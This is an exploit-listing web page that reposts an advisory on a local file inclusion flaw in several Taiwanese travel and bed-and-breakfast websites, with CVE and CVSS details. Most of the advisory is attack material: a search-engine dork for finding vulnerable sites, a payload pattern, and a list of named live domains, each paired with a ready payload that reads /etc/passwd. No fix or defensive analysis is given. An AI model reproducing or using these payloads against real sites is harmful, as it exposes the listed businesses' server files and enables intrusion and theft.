Advertisement






Taiwanese Travel Websites Local File Inclusion

CVE Category Price Severity
CVE-2021-28337 CWE-98 $500 High
Author Risk Exploitation Type Date
Unknown High Local 2020-05-28
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020050228

Below is a copy:

Taiwanese Travel Websites Local File Inclusion
# Exploit Title : Taiwanese Travel Websites - Local File Inclusion
# Author : Xmall75
# Vendor Homepage : yltravel.com.tw, hutravel.com.tw, tttravel.com.tw
# Date : 28 / 05 / 2020
# Tested on : Windows
# Dork : 
intext:COPYRIGHT  
intext:COPYRIGHT  
intext:"COPYRIGHT" inurl:?page=regulation.php

# Payload :
www.site.com/index.php?page=[file]

# Demo :
handays888.com/index.php?page=/etc/passwd
www.tenderyard.com.tw/index.php?page=/etc/passwd
www.4seasonsbnb.com/index.php?page=/etc/passwd
happywings.com.tw/index.php?page=/etc/passwd
www.sleepillowell.com.tw/index.php?page=/etc/passwd
loveback.com.tw/index.php?page=/etc/passwd
isa383.com/index.php?page=/etc/passwd
dragonbnb.com/index.php?page=/etc/passwd
greenozland.com/index.php?page=/etc/passwd
1955kids.com/index.php?page=/etc/passwd
www.windblown.idv.tw/index.php?page=/etc/passwd

# [email protected]

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum